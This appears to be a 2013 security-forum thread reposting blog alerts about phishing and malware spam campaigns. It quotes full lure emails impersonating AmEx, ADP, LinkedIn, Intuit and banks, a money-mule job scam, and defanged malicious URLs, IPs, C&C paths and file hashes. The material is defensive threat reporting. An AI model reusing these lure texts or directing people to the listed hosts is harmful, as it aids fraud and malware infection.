* http://gfisoftware.tumblr.com/
___
Fake American Express SPAM / dozakialko .ru
- http://blog.dynamoo.com/2013/01/american-express-spam-dozakialkoru.html
16 Jan 2013 - "This fake AmEx spam leads to malware on dozakialko .ru:
Sent: 16 January 2013 02:22
Subject: American Express Alert: Your Transaction is Aborted
Your Wed, 16 Jan 2013 01:22:07 -0100 Incoming Transfer is Terminated
Valued, $5203
Your American Express Card account retired ZUE36213 with amount of 5070 USD.
Transaction Time:Wed, 16 Jan 2013 01:22:07 -0100
Payment Due Date:Wed, 16 Jan 2013 01:22:07 -0100
One small way to help the environment - get paperless statements
Review billing
statement
Issue a payment
Change notifications
options
You currently reading the LIMITED DATA version of the Statement-Ready Information.
Switch to the DETAILED DATA version.
Thank you for your Cardmembership.
Sincerely,
American Express Information center
The malicious payload is at [donotclick]dozakialko .ru:8080/forum/links/column.php (report here*) hosted on the following IPs:
89.111.176.125 (Garant-Park-Telecom, Russia)
91.224.135.20 (Proservis UAB, Lithuania)
212.112.207.15 (ip4 GmbH, Germany)
Plain list of IPs and related domains for copy-and-pasting ..."
* http://wepawet.iseclab.org/view.php?hash=90855d4318147b4c3a78374383b0e147&type=js
___
Fake EFTPS emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/01/16/batch-payment-file-declined-eftps-themed-emails-lead-to-black-hole-exploit-kit/
Jan 16, 2013 - "Cybercriminals are currently mass mailing tens of thousands of emails, impersonating the EFTPS (Electronic Federal Tax Payment System), in an attempt to trick its users into clicking on exploits and malware serving malicious links found in the emails...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/email_spam_malware_exploits_black_hole_exploit_kit_eftps_batch_payment_declined.png
... Upon successful client-side exploitation, the campaign drops MD5: d35a52d639468c2c4c857e6629b3f6f0 * ... Worm:Win32/Cridex.E.
Once executed, the sample phones back to the following command and control servers:
109.230.229.250:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA
We’ve already seen the same pseudo-random C&C characters used in... previously profiled malicious campaigns..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/d9ca9dd90a250870c8a06665f8d86f088b5ebdca36457bf18347693ee0e71830/analysis/
File name: calc.exe
Detection ratio: 25/46
Analysis date: 2013-01-14
___
Fake ADP SPAM / teamrobotmusic .net
- http://blog.dynamoo.com/2013/01/adp-spam-teamrobotmusicnet.html
16 Jan 2013 - "This fake ADP spam leads to malware on teamrobotmusic .net:
Date: Wed, 16 Jan 2013 18:36:25 +0200 [11:36:25 EST]
From: "notify @adp .com" [notify @adp .com]
Subject: ADP Speedy Information
ADP Speedy Communication
[redacted]
Reference ID: 14580
Dear ADP Client January, 16 2012
Your Money Transfer Statement(s) have been uploaded to the web site:
https ://www.flexdirect .adp.com/client/login.aspx
Please see the following details:
• Please note that your bank account will be charged-off within 1 business day for the value(s) specified on the Record(s).
•Please don't reply to this message. auomatic informational system unable to accept incoming email. Please Contact your ADP Benefits Expert.
This email was sent to acting users in your company that access ADP Netsecure.
As usual, thank you for choosing ADP as your business affiliate!
Ref: 14580
The malicious payload is on [donotclick]teamrobotmusic .net/detects/bits_remember_confident.php hosted on 222.238.109.66 (Hanaro Telecom, Korea). This IP has been used in a few attacks recently and should be blocked if you can..."
:mad::fear::mad:
AplusWebMaster
2013-01-17, 15:31
FYI...
Fake Vodafone emails serve malware
- http://blog.webroot.com/2013/01/17/cybercriminals-resume-spamvertising-fake-vodafone-a-new-picture-or-video-message-themed-emails-serve-malware/
Jan 17, 2013 - "Over the past 24 hours, cybercriminals resumed spamvertising fake Vodafone MMS themed emails, in an attempt to trick the company’s customers into executing the malicious attachment found in these emails...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/email_spam_vodafone_mms_malware.png
Detection rate for the malicious executable:
MD5: bafebf4cdf640520e6266eb05b55d7c5 * ... Trojan-Downloader.Win32.Andromeda.pfu.
Once executed, the sample creates the following Registry values:
\Software\Microsoft\Windows\CurrentVersion\Run\SunJavaUpdateSched -> “C:\Documents and Settings\All Users\svchost.exe“
It also copies itself to other locations, and injects code in other processes. We intercepted a similar campaign last year, indicating that, depending on the campaign in question, cybercriminals are not always interested in popping up on everyone’s radar with persistent and systematic spamvertising of campaigns using identical templates. Instead, some of their campaigns tend to have a rather short-lived life cycle. We believe this practice is entirely based on the click-through rates for malicious URLs and actual statistics on the number of people that executed the malicious samples..."
* https://www.virustotal.com/file/f88990ff5b2f8621ffa1056d5cf977949e624802c43a8f511dae0d590fa8185c/analysis/1358366804/
File name: MMS.jpg.exe
Detection ratio: 21/46
Analysis date: 2013-01-16
___
Fake KeyBank "secure message" virus
- http://blog.dynamoo.com/2013/01/keybankcom-you-have-received-secure.html
17 Jan 2013 - "This fake KeyBank spam has an attachment called securedoc.zip which contains a malicious executable file named securedoc.exe.
Date: Thu, 17 Jan 2013 11:16:54 -0500 [11:16:54 EST]
From: "Antoine_Pearce @KeyBank .com" [Antoine_Pearce @KeyBank .com]
Subject: You have received a secure message
You have received a secure message
Read your secure message by opening the attachment, SECUREDOC. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions about Key's e-mail encryption service, please contact technical support at 888.764.7941.
First time users - will need to register after opening the attachment.
Help - https ://mailsafe.keybank .com/websafe/help?topic=RegEnvelope
About IronPort Encryption - https ://mailsafe.keybank .com/websafe/about
VirusTotal results are not good*. The ThreatExpert report for the malware can be found here**. The malware attempts to call home to:
173.230.139.4 (Linode, US)
192.155.83.208 (Linode, US)
..and download additional components from
[donotclick]ib-blaschke .de/4kzWUR.exe
[donotclick]chris-zukunftswege .de/DynThR8.exe
[donotclick]blueyellowbook .com/Cct1Kk58.exe ..."
* https://www.virustotal.com/file/ef538c20fd4b836aa220becef9239d72b78d527e9a85107883e5031105b4ed11/analysis/1358440323/
File name: securedoc.exe
Detection ratio: 5/46
Analysis date: 2013-01-17
** http://www.threatexpert.com/report.aspx?md5=315b81b62fb81baa990f1317f1b68610
___
Fake Wire Transfer SPAM / dfudont .ru
- http://blog.dynamoo.com/2013/01/wire-transfer-confirmation-spam.html
17 Jan 2013 - "This spam leads to malware on dfudont .ru:
Date: Fri, 18 Jan 2013 08:58:56 +0600 [21:58:56 EST]
From: SUMMERDnIKYkatTerry @aol .com
Subject: Fwd: Wire Transfer Confirmation (FED_59983S76643)
Dear Bank Account Operator,
WIRE TRANSFER: FED86180794682707910
CURRENT STATUS: PENDING
Please REVIEW YOUR TRANSACTION as soon as possible.
The malicious payload is at [donotclick]dfudont .ru:8080/forum/links/column.php hosted on:
89.111.176.125 (Garant-Park-Telecom, Russia)
91.224.135.20 (Proservis UAB, Lithuania)
212.112.207.15 (ip4 GmbH, Germany)
These IPs have been used in several malware attacks recently - blocking them is a good idea. The following malicious domains are also present on these servers ...
Update: there is also a fake Sendspace spam sending visitors to the same payload...
Date: Thu, 17 Jan 2013 03:03:55 +0430
From: Badoo [noreply @badoo .com]
Subject: You have been sent a file (Filename: [redacted]_N584581.pdf)
Sendspace File Delivery Notification:
You've got a file called [redacted]_N390.pdf, (973.39 KB) waiting to be downloaded at sendspace.(It was sent by JOHNETTE ).
You can use the following link to retrieve your file:
Download
Thank you,
Sendspace, the best free file sharing service.
:mad:
AplusWebMaster
2013-01-18, 03:44
FYI...
Fake Java update is malware
- http://blog.trendmicro.com/trendlabs-security-intelligence/malware-poses-as-an-update-for-java-0-day-fix/
Jan 17, 2013 - "... We were alerted to reports of a malware that poses as Java Update 11 created by an unknown publisher. The said fake update in question is javaupdate11.jar (detected as JAVA_DLOADER.NTW), which contains javaupdate11.class that downloads and executes malicious files up1.exe and up2.exe (both detected as BKDR_ANDROM.NTW). Once executed, this backdoor connects to a remote server that enables a possible attacker to take control of the infected system. Users can get this fake update by visiting the malicious website, {BLOCKED}currencyreport .com/cybercrime-suspect-arrested/javaupdate11.jar.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/01/fake_java_update_site.gif
Though the dropped malware does not exploit CVE-2012-3174 or any Java-related vulnerability, the bad guys behind this threat are clearly piggybacking on the Java zero-day incident and users’ fears. The use of fake software updates is an old social engineering tactic. This is not the first time that cybercriminals took advantage of software updates. Last year, we reported about a malware disguised as a Yahoo! Messenger, which we found in time for Yahoo!’s announcement of its update for Messenger..."
:mad:
AplusWebMaster
2013-01-18, 16:57
FYI...
Fake "A.R.T. Logistics" job offer
- http://blog.dynamoo.com/2013/01/art-logistics-fake-job-offer.html
18 Jan 2013 - "There may be various genuine companies in the world with a name similar to "A.R.T. Logistics Industrial & Trading Ltd", but this job offer does not come from a genuine company. Instead it is trying to recruit people for money laundering ("money mule") jobs and parcel reshipping scams (a way of laundering stolen goods). Note that the scammers aren't even consistent in the way they name the company.
From: ART LOGISTICS INDUSTRIAL AND TRADING LTD [info@sender .org]
Reply-To: artlogisticsltd @yahoo .com.ph
Date: 18 January 2013 07:49
Subject: A.R.T. LOGISTICS INDUSTRIAL & TRADING LIMITED
A.R.T LOGISTIC INDUSTRIAL & TRADING LIMITED
Export & Import Agent‚ Service Company.
46/F Tower 1, Metroplaza 223 Hing Fong Road,
Kwai Chung New Territories, Hong Kong.
A.R.T. Logistics mainly provides services to customers in Russia, Kazakhstan and Hong Kong. We provide: - Air freight - Sea freight (FCL & LCL to EU, Russia, Kazakhstan & Central Asia) - Rail freight - Road Freight (FTL & LTL to any place in Russia, Kazakhstan and Central Asia) Our company has worked in Russia, Kazakhstan & Central Asia since 2005 and has wide experience of transport such as airfreight, container and rail.
We are presently shifting our base to North America and we have collective customers in the United State & Canada but We find it difficult establishing payments modalities with this customers and we don't intend loosing our customers. We are searching for a front line representative as intermediary by establishing a medium of getting payments from this customers in Canada & America by making payments through you to us. Do contact us for more information at this e-mail: (artlogis @e-mail .ua).
Subject to your satisfaction with the front line representative offer, you will be made our foreign payment receiving officer in your region and you will deduct 10% of every transactions made through you for your services as our Financial Representative.
Sincerely,
Yasar Feng Xu
A.R.T LOGISTIC INDUSTRIAL & TRADING LIMITED
N.B Reply to: artlogisticsltd @yahoo .com.ph
In this case, the spam originates from 31.186.186.2 [mail.zsmirotice .cz]. Avoid!"
___
Shylock banking trojan travels by Skype
- http://h-online.com/-1786928
18 Jan 2013 - "The banking trojan Shylock has found itself a new distribution channel – Skype. The security firm CSIS* recently discovered a Shylock module called "msg.gsm" trying to use the VoIP software to infect other computers. If successful, the malware then sets up a typical backdoor. The module tries to send Shylock as a file, bypassing warnings from the Skype software by confirming them itself and cleaning any generated messages from the Skype history. Once the trojan has been transferred it connects to a command and control server which can ask it to install a VNC server allowing remote control of the computer, get cookies, inject HTTP code into web sites being browsed, spread Shylock over removable drives, or upload files to a server. The epicenter of infections is, according to CSIS, the UK... At the time of writing, the most recent VirusTotal test** shows 15 of the engines now detecting it..."
* https://www.csis.dk/en/csis/blog/3811/
** https://www.virustotal.com/file/4bd97130a89c2f9080259d8e87d8d713a23fd0e4336eabb0bf47a44d700ec842/analysis/
File name: 8fbeb78b06985c3188562e2f1b82d57d
Detection ratio: 15/46
Analysis date: 2013-01-18
___
Fake LinkedIn SPAM / shininghill .net
- http://blog.dynamoo.com/2013/01/linkedin-spam-shininghillnet.html
18 Jan 2013 - "This fake LinkedIn spam leads to malware on shininghill .net:
Date: Fri, 18 Jan 2013 18:16:32 +0200
From: "LinkedIn" [announce@e .linkedin .com]
Subject: LinkedIn Information service message
LinkedIn
REMINDERS
Invite notifications:
? From MiaDiaz ( Your renter)
PENDING EVENTS
∙ There are a total of 2 messages awaiting your response. Enter your InBox right now.
Don't want to get email info letters? Change your message settings.
LinkedIn values your privacy. Not once has LinkedIn made your e-mail address available to any another LinkedIn member without your permission. © 2013, LinkedIn Corporation.
The malicious payload is at [donotclick]shininghill.net/detects/solved-surely-considerable.php hosted on 222.238.109.66 (Hanaro Telecom, Korea). This IP address has been used in several recent attacks and should be blocked if you can.
The following domains appear to be active on this IP address, all should be considered to be malicious..."
(More detail at the dynamoo URL above.)
___
Fake ADP SPAM / dopaminko .ru
- http://blog.dynamoo.com/2013/01/adp-spam-dopaminkoru.html
18 Jan 2013 - "This fake ADP spam leads to malware on dopaminko .ru:
Date: Fri, 18 Jan 2013 09:08:38 -0500
From: "service @paypal .com" [service @paypal .com]
Subject: ADP Immediate Notification
ADP Immediate Notification
Reference #: 544043911
Fri, 18 Jan 2013 09:08:38 -0500
Dear ADP Client
Your Transfer Record(s) have been created at the web site:
https ://www.lexdirect.adp .com/client/login.aspx
Please see the following notes:
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
This note was sent to acting users in your system that approach ADP Netsecure.
As usual, thank you for choosing ADP as your business affiliate!
Ref: 206179035
HR. Payroll. Benefits.
The ADP logo and ADP are registered trademarks of ADP, Inc.
In the business of your success is a service mark of ADP, Inc.
© 2013 ADP, Inc. All rights reserved.
The malicious payload is at [donotclick]dopaminko .ru:8080/forum/links/column.php hosted on the following familiar IP addresses:
89.111.176.125 (Garant-Park-Telecom, Russia)
91.224.135.20 (Proservis UAB, Lithuania)
212.112.207.15 (ip4 GmbH, Germany)
These following malicious domains appear to be active on these servers..."
(More detail at the dynamoo URL above.)
:mad: :mad:
AplusWebMaster
2013-01-21, 16:09
FYI...
Phishers target UnionBank of the Philippines clients
- http://www.gfi.com/blog/phishers-target-unionbank-of-the-philippines-clients/
Jan 21, 2013 - "We have been alerted by an ongoing phishing campaign that targets clients and online banking users of the UnionBank of the Philippines. The phishing URL, which is being sent to users in the form of spam, is found hosted on a legitimate but compromised Russian domain. We have also found previous records of the said domain hosting a different phishing page a few days ago. The spam entices users to visit a certain URL to “reactivate” their account... This phishing page has closely mimicked the look or template of legitimate pages where users can enter their sensitive banking information... Once users have entered and submitted their information, a confirmation window pops up and then users are redirected to the legitimate UnionBank website... Most UnionBank users have their PayPal accounts tied to their banking accounts, so it is very important to steer clear from emails claiming to be from the bank that ask for banking details... better call them and inquire about the email you receive just to be sure. It also pays to consult this Anti-Fraud and Anti-Phishing Guidelines page* from UnionBank for guidance on how to identify phishing pages from the real ones."
* http://www.unionbankph.com/index.php?option=com_content&view=article&id=1083&Itemid=472
(Screenshots available at the gfi URL above.)
___
Malware Masks as Latest Java Update
- http://www.gfi.com/blog/malware-masks-as-latest-java-update/
Jan 21, 2013 - "... security experts have discovered a new zero-day, critical flaw in Java not so long ago, which is already integrated into popular exploit kits, such as Blackhole, Redkit, Cool and Nuclear Pack. The said flaw, once exploited, is said to allow remote code execution on a target system without authentication from the user. This, of course, gives malware files the upper hand if users visit sites/URLs where they are hosted. Immediately after the vulnerability was found, Oracle released its patch. Despite this speedy response from the company, many security experts have already begun advising users to just forget the patch and disable Java in their browsers. Perhaps some users have already made the move of disabling Java entirely, or perhaps some users have opted still to apply the patch. Whether you belong to the former group or the latter group, let this be our reminder to you: Please make sure that you’re downloading the patch straight from the Oracle website* and nowhere else because it’s highly likely that what you may be installing onto your system is malware**..."
* http://java.com/en/download/index.jsp
** http://blog.trendmicro.com/trendlabs-security-intelligence/malware-poses-as-an-update-for-java-0-day-fix/
___
Kenyan Judiciary (judiciary .go.ke) hacked to serve malware
- http://blog.dynamoo.com/2013/01/kenyan-judiciary-judiciarygoke-hacked.html
21 Jan 2013 - "The Judiciary of the Republic of Kenya has a mission to deliver justice fairly, impartially and expeditiously, promote equal access to justice, and advance local jurisprudence by upholding the rule of law. Unfortunately, it has also been hacked to serve up malware.
> https://lh3.ggpht.com/-DbemA5jmT9g/UP0RScKxfPI/AAAAAAAAA4g/XaSZN1V3jjM/s400/judiciary-go-ke.png
The site has been compromised to serve up an exploit kit being promoted by spam email. There's a redirector at [donotclick]www.judiciary .go.ke /wlc.htm attempting to redirect visitors to [donotclick]dfudont .ru:8080/forum/links/column.php where there's a nasty exploit kit.
> https://lh3.ggpht.com/-OhchceHjVws/UP0aGR02XlI/AAAAAAAAA40/q9qYel1t7lU/s400/judiciary-go-ke2.png
Of course, most visitors to the judiciary .go.ke site won't see that particular exploit. But if someone can create an arbitrary HTML page on that server, then they pretty much have the run of the whole thing and they can do what they like. So the question might be.. what else has been compromised? Hmm."
___
LinkedIn spam / prepadav .com
- http://blog.dynamoo.com/2013/01/linkedin-spam-prepadavcom.html
21 Jan 2013 - "This fake LinkedIn spam leads to malware on prepadav .com:
From: LinkedIn [mailto :news@ linkedin .com]
Sent: 21 January 2013 16:21
Subject: LinkedIn Reminder from your co-worker
LinkedIn
REMINDERS
Invitation reminders:
From CooperWright ( Your employer)
PENDING LETTERS
• There are a total of 2 messages awaiting your action. Acces to your InBox now.
Don't wish to receive email notifications? Adjust your letters settings.
LinkedIn respect your privacy. In no circumstances has LinkedIn made your e-mail acceptable to any other LinkedIn user without your allowance. © 2013, LinkedIn Corporation.
The malicious payload is at [donotclick]prepadav .com/detects/region_applied-depending.php hosted on 222.238.109.66 (Hanaro Telecom, Korea). This IP has been used in several malware attacks recently and it should be blocked if you can..."
___
Fake Intuit SPAM / danadala .ru
- http://blog.dynamoo.com/2013/01/intuit-spam-danadalaru.html
21 Jan 2013 - "This fake Intuit spam leads to malware on danadala .ru:
Date: Mon, 21 Jan 2013 04:45:31 -0300
From: RylieBouthillette @hotmail .com
Subject: Payroll Account Holded by Intuit
Direct Deposit Service Informer
Communicatory Only
We cancelled your payroll on Mon, 21 Jan 2013 04:45:31 -0300.
Finances would be gone away from below account # ending in 8134 on Mon, 21 Jan 2013 04:45:31 -0300
amount to be seceded: 5670 USD
Paychecks would be procrastinated to your personnel accounts on: Mon, 21 Jan 2013 04:45:31 -0300
Log In to Review Operation
Funds are typically left before working banking hours so please make sure you have enough Finances accessible by 12 a.m. on the date Cash are to be seceded.
Intuit must reject your payroll by 4 p.m. Central time, two banking days before your paycheck date or your state would not be paid on time.
QuickBooks does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be viewed at the Federal Reserve website.
Thank you for your business.
Regards,
Intuit Payroll Services
The malicious payload is at [donotclick]danadala .ru:8080/forum/links/column.php hosted on a familiar bunch of IPs that have been used in several recent attacks:
89.111.176.125 (Garant-Park-Telecom, Russia)
91.224.135.20 (Proservis UAB, Lithuania)
212.112.207.15 (ip4 GmbH, Germany)..."
:mad::mad: :fear:
AplusWebMaster
2013-01-22, 17:03
FYI...
Blackhole exploit kit on avirasecureserver .com
- http://blog.dynamoo.com/2013/01/cheeky-exploit-kit-on.html
22 Jan 2013 - "What is avirasecureserver .com? Well, it's not Avira that's for sure.. it is in fact a server for the Blackhole Exploit Kit*. This site is hosted on 82.145.57.3, an Iomart / Rapidswitch IP... There's also no company in the UK called QHoster Ltd. In fact, if we check the QHoster.com domain we can see that it is a Bulgarian firm... QHoster has an IP block of 82.145.57.0/25 suballocated to it. A quick poke around indicates not much of value in this range, you may want to consider blocking the /25 as a precaution."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=788732
- https://www.google.com/safebrowsing/diagnostic?site=AS:20860
"Of the 18705 site(s) we tested on this network over the past 90 days, 1489 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-01-22, and the last time suspicious content was found was on 2013-01-21... Over the past 90 days, we found 14 site(s) on this network... that appeared to function as intermediaries for the infection of 670 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 22 site(s)... that infected 1080 other site(s)..."
___
'Droid malware spreads through compromised legitimate Web sites
- http://blog.webroot.com/2013/01/22/android-malware-spreads-through-compromised-legitimate-web-sites/
22 Jan 2013 - "... our sensor networks picked up an interesting website infection affecting a popular Bulgarian website for branded watches, which ultimately redirects and downloads premium rate SMS Android malware on the visiting user devices. The affected Bulgarian website is only the tip of the iceberg, based on the diversified portfolio of malicious domains known to have been launched by the same party that launched the original campaign...
Sample screenshot of the executed Android malware:
> https://webrootblog.files.wordpress.com/2013/01/android_malware_fake_adobe_flash_player_fake_android_browser_fake_google_play_applications.png
... Sample malicious URLs displayed to Android users:
hxxp ://adobeflashplayer-up .ru/?a=RANDOM_CHARACTERS – 93.170.107.184
hxxp ://googleplaynew .ru/?a=RANDOM_CHARACTERS – 93.170.107.184
hxxp ://browsernew-update .ru/?a=RANDOM_CHARACTERS – 93.170.107.184
... Detection rate for the malicious .apk files:
flash_player_installer.apk – MD5: 29e8db2c055574e26fd0b47859e78c0e * ... Android.SmsSend.212.origin.
Android_installer-1.apk – MD5: e6be5815a05c309a81236d82fec631c8 * ... HEUR:Trojan-SMS.AndroidOS.Opfake.bo.
... Upon execution, the Android sample phones back to gaga01 .net/rq.php – 93.170.107.57 – Email: mypiupiu1 @gmail.com transmitting..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/2076cb718edae12fa641a6b28cc53aee8d9d495518836bcc24e8e8bd1172f892/analysis/1358799096/
File name: flash_player_installer.apk
Detection ratio: 5/46
Analysis date: 2013-01-21
** https://www.virustotal.com/file/68991103bd0eb8594f528065fe93c1388de864da3f0e08d358eb7276f28d4f7d/analysis/1358799258/
File name: Android_installer-1.apk
Detection ratio: 5/46
Analysis date: 2013-01-21
> https://www.google.com/safebrowsing/diagnostic?site=AS:57062
"Of the 2027 site(s) we tested on this network over the past 90 days, 23 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-01-22, and the last time suspicious content was found was on 2013-01-22... Over the past 90 days, we found 75 site(s) on this network... that appeared to function as intermediaries for the infection of 104 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 496 site(s)... that infected 1485 other site(s)..."
___
Something evil on 109.123.66.30
- http://blog.dynamoo.com/2013/01/something-evil-on-1091236630.html
22 January 2013 - "109.123.66.30 (UK2.NET, UK) hosts several domains containing the Blackhole Exploit Kit (example here*). The domains in use are (mostly) legitimate hacked domains, but there are a couple of odd things here. Most of the malicious domains have a format like this: 700ff4ad03c655cb11919113011611137102708d4fb6daf0e74bea4aa5e8f9f.darkhands .com - in this case darkhands .com is a legitimate domain registered to an individual in Australia, but it has been hacked to create a whole load of malicious subdomains, hosted on another server from www .darkhands .com. In fact, almost all the domains are registered to Australians, but the key thing is that in all of those cases the main domains are hosted by OrionVM in Australia, with the main domains hosted in the 49.156.18.0/24 block. So how can the main (legitimate) sites be hosted in 49.156.18.0/24, but the malicious subdomains be hosted on a completely different network in the UK? I suspect that there is a compromise of some sort at OrionVM which has allowed the DNS records to be changed (it should be noted that these domains used several different registrars). Another oddity is that these hijacked domains only go from A to I alphabetically, which indicates that there might be some other malicious servers in this same group... Also hosted on 109.123.66.30 are some malicious .in domains that were previously on 87.229.26.138 (see here**)... It looks like there are some legitimate sites on the same server, but blocking 109.123.66.30 is probably a good idea."
(Long list of domains at the dynamoo URL above.)
* http://urlquery.net/report.php?id=796905
** http://blog.dynamoo.com/2012/12/something-evil-on-8722926138.html
___
Fake Swiss tax SPAM / africanbeat .net
- http://blog.dynamoo.com/2013/01/dutch-language-swiss-tax-spam.html
22 Jan 2013 - "This Nederlands language spam appears to be from some Swiss tax authority, but in fact it leads to the Blackhole Exploit kit on africanbeat .net:
From: report@ ag .ch via bernina .co .il
Date: 22 January 2013 13:48
Subject: Re: je NAT3799 belastingformulier
Mailed-by: bernina .co .il
[redacted]
Wij willen brengen aan uw bericht dat je hebt fouten gemaakt bij het invullen van de meest recente belastingformulier NAT3799 (ID: 023520).
vindt u aanbevelingen en tips van onze fiscalisten HIER
( Wacht 2 minuten op het verslag te laden)
Wij verzoeken u om corrigeer de fouten en verzenden de gecorrigeerd aangifte aan uw belastingadviseur zo snel mogelijk.
Kanton Aargau
Sonja Urech
Sachbearbeiterin Wehrpflichtersatzverwaltung
Departement Gesundheit und Soziales
Abteilung Militär und Bevölkerungsschutz
Rohrerstrasse 7, Postfach, 6253 Aarau
Tel.: +41 (0)62 332 31 62
Fax: +41 (0)62 332 33 18
Translated as:
We want to bring to your notice that you have made mistakes when completing the most recent tax form NAT3799 (ID: 023520).
You can find recommendations and tips from our tax specialists HERE
(Wait 2 minutes for the report to load)
We ask you to correct the error and send the corrected report to your tax advisor as soon as possible.
The link leads to an exploit kit at [donotclick]africanbeat .net/detects/urgent.php (report here*) hosted on the familiar IP address of 222.238.109.66 (Hanaro Telecom, Korea)..."
(More at the dynamoo URL above.)
* http://urlquery.net/report.php?id=801678
:mad: :fear:
AplusWebMaster
2013-01-23, 15:31
FYI...
Fake Intuit emails lead to Black Hole Exploit Kit
- http://blog.webroot.com/2013/01/23/fake-intuit-direct-deposit-service-informer-themed-emails-lead-to-black-hole-exploit-kit/
Jan 23, 2013 - "Cybercriminals are currently spamvertising tens of thousands of fake emails, impersonating Intuit, in an attempt to trick its customers and users into clicking on the malicious links found in the emails. Once users click on any of the links, they’re exposed to the client-side exploits served by the latest version of the Black Hole Exploit Kit, which ultimately drops malware on the affected hosts...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/fake_intuit_direct_deposit_service_informer_email_spam_exploits_malware_black_hole_exploit_kit.png
... Malicious domain name reconnaissance:
dopaminko .ru – 212.112.207.15
Name server: ns1.dopaminko .ru – 62.76.185.169
Name server: ns2.dopaminko .ru – 41.168.5.140
Name server: ns3.dopaminko .ru – 42.121.116.38
Name server: ns4.dopaminko .ru – 110.164.58.250
Name server: ns5.dopaminko .ru – 210.71.250.131
More malicious domains are known to have responded to the same IP (212.112.207.15)...
Some of these domains also respond to the following IPs – 91.224.135.20; 46.175.224.21, with more malicious domains part of the campaign’s infrastructure..."
(More detail at the webroot URL above.)
___
Phishing Scam spreads via Facebook PM
- http://www.gfi.com/blog/phishing-scam-spreads-via-facebook-pm/
Jan 23, 2013 - "We’ve seen a number of cases wherein phishers have used compromised Twitter accounts to send direct messages (DMs) to their followers. We’re now beginning to see this same tactic used in Facebook in the form of private messages (PMs), and this isn’t just some spam mail in your inbox claiming you have received a “private message”... Recipients can act on this message in two ways: they can click the link to confirm their account, or simply ignore the message and delete it from their message inbox. Users who do the latter are guaranteed to be safe from this sort of scam. Users who do the former, however, are led to a single site where they can enter all personal information asked from them... Unsolicited messages from phishers landing on your private message inbox are no longer limited to Twitter. Despite this old method being used in a different platform, our advice on how to avoid falling for such scams remain the same: Always check the URL to be sure you’re not going to visit a link that is completely unrelated to Facebook—“Think before you click”, remember?; be skeptical about messages claiming to have come from Facebook; lastly, never share the URL to anyone on Facebook or on your other social sites as this only increases the possibility of someone clicking the link and getting phished themselves."
(Screenshots available at the gfi URL above.)
___
Fake NACHA SPAM / canonicalgrumbles .biz
- http://blog.dynamoo.com/2013/01/nacha-spam-canonicalgrumblesbiz.html
23 Jan 2013 - "... fake NACHA spam leads to malware on canonicalgrumbles .biz... The malicious payload is at [donotclick]canonicalgrumbles .biz/closest/984y3fh8u3hfu3jcihei.php (report here*) hosted on 93.190.46.138 (Ukranian Hosting / ukrainianhosting .com). I've seen other malware servers in 93.190.40.0/21 before, I would recommend blocking the whole lot."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=814512
___
Bogus Job SPAM ...
- http://blog.dynamoo.com/2013/01/h-seal-is-real-legitimate-firm.html
23 Jan 2013 - "H Seal is a real, legitimate firm. This email is -not- from H Seal, but a criminal organisation wanting to recruit people for money laundering and other unlawful activities. Originating IP is 199.254.123.20 ..."
(More detail at the dynamoo URL above.)
___
Fake Corporate eFax SPAM / 13.carnovirious .net
- http://blog.dynamoo.com/2013/01/corporate-efax-spam-13carnoviriousnet.html
23 Jan 2013 - "This spam is leading to malware on 13.carnovirious .net, a domain spotted earlier today.. but one that has switched server to 74.91.117.49 since then... The spam leads to an exploit kit on [donotclick]13.carnovirious .net/read/persons_jobs.php hosted on 74.91.117.49 by Nuclear Fallout Enterprises. You should probably block 74.91.117.50 as well..."
(More detail at the dynamoo URL above.)
___
Fake USPS SPAM / euronotedetector .net
- http://blog.dynamoo.com/2013/01/usps-spam-euronotedetectornet.html
23 Jan 2013 - "This fake USPS spam leads to malware on euronotedetector .net... The malicious payload is at [donotclick]euronotedetector .net/detects/updated_led-concerns.php hosted on the familiar IP address of 222.238.109.66 (Hanaro Telecom, Korea) which has been used in several recent attacks..."
(More detail at the dynamoo URL above.)
___
Fake BT Business SPAM / esenstialin .ru
- http://blog.dynamoo.com/2013/01/bt-business-spam-esenstialinru.html
23 Jan 2013 - "This fake BT Business spam leads to malware on esenstialin .ru... The malicious payload is on [donotclick]esenstialin .ru:8080/forum/links/column.php hosted on the following IPs:
50.31.1.104 (Steadfast Networks, US)
91.224.135.20 (Proservis UAB, Lithuania)..."
(More detail at the dynamoo URL above.)
___
Something evil on 74.91.117.50
- http://blog.dynamoo.com/2013/01/something-evil-on-749111750.html
23 Jan 2013 - "OK, I can see just two malicious domains on 74.91.117.50 but they are currently spreading an exploit kit through this spam run. The domain is allocated to Nuclear Fallout Enterprises who often seem to host malware sites like this, so there's a good chance that more evil will turn up on this IP.
These are the domains that I can see right now:
13.blumotorada .net
13.carnovirious .net
The domains are registered with these apparently fake details:
Glen Drobney office @glenarrinera .com
1118 hagler dr / neptune bch
FL 32266 US
Phone: +1.9044019773
Since there will almost definitely be more malicious domains coming up on this IP, it is well worth blocking."
___
Fake ADP SPAM / elemikn .ru
- http://blog.dynamoo.com/2013/01/adp-spam-elemiknru.html
22 Jan 2013 - "This fake ADP spam potentially leads to malware on elemikn .ru:
Date: Tue, 22 Jan 2013 12:25:06 +0100
From: LinkedIn [welcome @linkedin .com]
Subject: ADP Immediate Notification
ADP Immediate Notification
Reference #: 815979361
Tue, 22 Jan 2013 12:25:06 +0100
Dear ADP Client
Your Transfer Record(s) have been created at the web site:
https ://www .flexdirect .adp .com/client/login.aspx
Please see the following notes:
